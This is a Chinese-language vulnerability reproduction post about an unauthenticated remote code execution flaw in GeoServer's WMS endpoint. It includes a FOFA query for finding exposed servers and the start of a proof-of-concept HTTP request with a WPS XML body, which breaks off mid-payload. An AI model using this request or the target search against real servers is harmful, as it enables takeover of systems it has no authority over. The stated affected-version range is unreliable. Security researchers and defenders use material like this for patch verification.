0x01 产品简介

GeoServer是一款开源的地理数据服务器软件，主要用于发布、共享和处理各种地理空间数据。它支持众多的地图和空间数据标准，能够使各种设备通过网络来浏览和使用这些地理信息数据。

0x02 漏洞概述

GeoServer /geoserver/wms 接口处存在远程代码执行漏洞，未经身份验证的远程攻击者可利用此漏洞执行任意shell命令，从而获取服务器权限。

0x03 影响范围

GeoServer <1.2.2

0x04 复现环境

FOFA：app="GeoServer"

0x05 漏洞复现

PoC

POST /geoserver/wms HTTP/1.1
Host: your-ip
Content-Type: application/xml
Accept-Encoding: gzip, deflate<?xml version="1.0" encoding="UTF-8"?><wps:Execute version="1.0.0" service="WPS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://www.opengis.net/w